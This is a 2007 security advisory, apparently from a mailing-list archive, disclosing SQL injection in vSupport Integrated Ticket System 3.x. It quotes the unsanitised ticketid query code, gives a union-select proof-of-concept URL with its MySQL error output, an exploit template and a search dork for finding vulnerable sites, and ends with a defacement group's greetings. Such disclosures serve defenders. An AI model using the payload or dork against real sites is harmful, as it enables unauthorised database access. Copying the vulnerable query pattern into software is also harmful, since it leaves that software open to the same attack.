vSupport Integrated Ticket System 3.*.* SQL injection Jun 09 2007 02:33PM
stormhacker hotmail com
+--------------------------------------------------------------------
+
+ Affected Software .: vSupport Integrated Ticket System
+ Venedor ...........: http://www.cmgsccc.com
+ Class .............: SQL injection
+ Dork ..............: inurl:vBSupport.php
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.sec-area.com/
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------
+ PoC:
+
+ Database error SQL
+--------------------------------------------------------------------
// do not limit the users access
$fromuseraccess = "";
}

// get the info about the ticket first
if ($ticket = $db->query_first("
SELECT ticket.*
" . iif($vbulletin->options['privallowicons'], ",icon.title AS icontitle, icon.iconpath") . "
FROM " . TABLE_PREFIX . "ticket as ticket
" . iif($vbulletin->options['privallowicons'], "LEFT JOIN " . TABLE_PREFIX . "icon AS icon ON(icon.iconid = ticket.iconid)") . "
WHERE ticketid=" . $vbulletin->GPC['ticketid'] . "
$fromuseraccess
"))
{

+--------------------------------------------------------------------
+ An example:
+--------------------------------------------------------------------

http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/se
lect/**/

+--------------------------------------------------------------------
+ output:
+--------------------------------------------------------------------

MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 5
Error Number : 1064

Date : Monday, July 2nd 2007 @ 02:54:54 PM
Script : http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/se
lect/**/
Referrer :
IP Address : 127.0.0.1
Username : admin
Classname : vb_database
Invalid SQL:

SELECT ticket.*
,icon.title AS icontitle, icon.iconpath
FROM ticket as ticket
LEFT JOIN icon AS icon ON(icon.iconid = ticket.iconid)
WHERE ticketid=1/**/union/**/select/**/;
+--------------------------------------------------------------------
+ Exploit :
+--------------------------------------------------------------------
http://localhost/4/vBSupport.php?do=showticket&ticketid=[SQL]

+--------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+--------------------------------------------------------------------
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||
+ || Pro Hacker || - || DARKFIRE ||
+
+-------------------------[ W D T ]----------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus